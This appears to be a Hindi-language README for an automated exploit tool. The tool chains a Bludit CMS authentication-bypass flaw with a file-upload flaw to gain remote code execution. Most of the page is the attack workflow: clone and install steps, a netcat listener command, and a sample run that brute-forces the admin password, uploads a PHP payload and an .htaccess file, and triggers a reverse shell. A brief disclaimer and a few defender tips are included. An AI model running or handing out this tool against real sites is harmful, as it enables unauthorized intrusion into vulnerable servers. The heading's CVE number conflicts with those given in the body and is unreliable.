
cve-2016-16113
_ _____ ___ _
__| |___ /_ ___ __ / _ \ _ __ ___ (_)
/ _` | |_ \ \ / / '_ \| | | | '_ ` _ \| |
| (_| |___) \ V /| | | | |_| | | | | | | |
\__,_|____/ \_/ |_| |_|\___/|_| |_| |_|_|
एक स्वचालित शोषण उपकरण जो CVE-2019-17240 (प्रमाणीकरण बायपास) और CVE-2019-16113 (मनमाना फ़ाइल अपलोड) को जोड़कर कमजोर Bludit CMS इंस्टॉलेशन पर रिमोट कोड निष्पादन प्राप्त करता है।
केवल अधिकृत सुरक्षा परीक्षण के लिए
यह उपकरण सुरक्षा पेशेवरों के लिए है जो अधिकृत पैठ परीक्षण कर रहे हैं और सुरक्षा शोधकर्ता जो कानूनी सीमाओं के भीतर काम कर रहे हैं। कंप्यूटर सिस्टम तक अनाधिकृत पहुँच संयुक्त राज्य अमेरिका में कंप्यूटर फ्रॉड एंड अब्यूज एक्ट (CFAA) और दुनिया भर में समान कानूनों के तहत अवैध है।
इस उपकरण का उपयोग करके, आप सहमत हैं:
लेखक कोई देयता नहीं लेता है और इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।
यह शोषण निम्नलिखित प्रक्रिया को स्वचालित करता है:
प्रभावित संस्करण: Bludit CMS संस्करण 3.9.2 और उससे नीचे
requests# रिपॉजिटरी को क्लोन करें
git clone https://github.com/yourusername/get-rce.git
cd get-rce
# निर्भरताएँ स्थापित करें
pip install -r requirements.txt
requirements.txt:
requests>=2.25.0
python3 get_rce.py
स्क्रिप्ट आपसे निम्नलिखित पूछेगी:
https://target.com)शोषण चलाने से पहले, एक netcat लिसनर सेट करें:
nc -lvnp 4444
4444 को अपने चुने गए पोर्ट से बदलें।
$ python3 get_rce.py
Enter target URL (i.e. https://target.com): http://10.10.10.191
[ ~ ] Enter listener's IP: 10.10.14.5
[ ~ ] Enter listener's port: 4444
[...] Checking if the target is live...
[ + ] The target is live! We are good to go...
[ ~ ] Should I bruteforce username? [Y/N]: N
[ ~ ] What username should I use? (leave this to use admin as username):
[...] We are gonna default to 'admin' as username.
[ ~ ] Enter the location for password list: /usr/share/wordlists/rockyou.txt
[ * ] Tried: 123456
[ * ] Tried: password
[ * ] Tried: 12345678
...
[ + ] Creds found: admin:Password123
[ + ] Login succeed... We are good to go :)
[ + ] The payload XyZaBcDeFg.php has been uploaded...
[ + ] The payload .htaccess has been uploaded...
[...] Attempting to get a shell... @ http://10.10.10.191/bl-content/tmp/XyZaBcDeFg.php
[ + ] You should be getting a shell by now, if not open http://10.10.10.191/bl-content/tmp/XyZaBcDeFg.php
Should I bruteforce username? [Y/N]: N
What username should I use?: admin
Enter the location for password list: /path/to/passwords.txt
Should I bruteforce username? [Y/N]: Y
Enter the location for username wordlist: /path/to/usernames.txt
Enter the location for password wordlist: /path/to/passwords.txt
SecLists: https://github.com/danielmiessler/SecLists
SecLists/Usernames/Names/names.txtSecLists/Passwords/Common-Credentials/10-million-password-list-top-1000.txtRockYou: /usr/share/wordlists/rockyou.txt (Kali Linux)
X-Forwarded-For हेडर में हेरफेर करता है/bl-content/tmp/ पर अपलोड करता है.htaccess फ़ाइल अपलोड करता हैयदि आप सिस्टम प्रशासक हैं:
/bl-content/tmp/ निर्देशिका की निगरानी करेंसमस्या: "The target seems to be down"
समस्या: "Login failed"
समस्या: "No shell received"
d3vn0mi
यह प्रोजेक्ट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। इस README के शीर्ष पर दिए गए अस्वीकरण देखें।
योगदान, मुद्दे और सुविधा अनुरोधों का स्वागत है! बेझिझक मुद्दों के पृष्ठ पर जाएँ।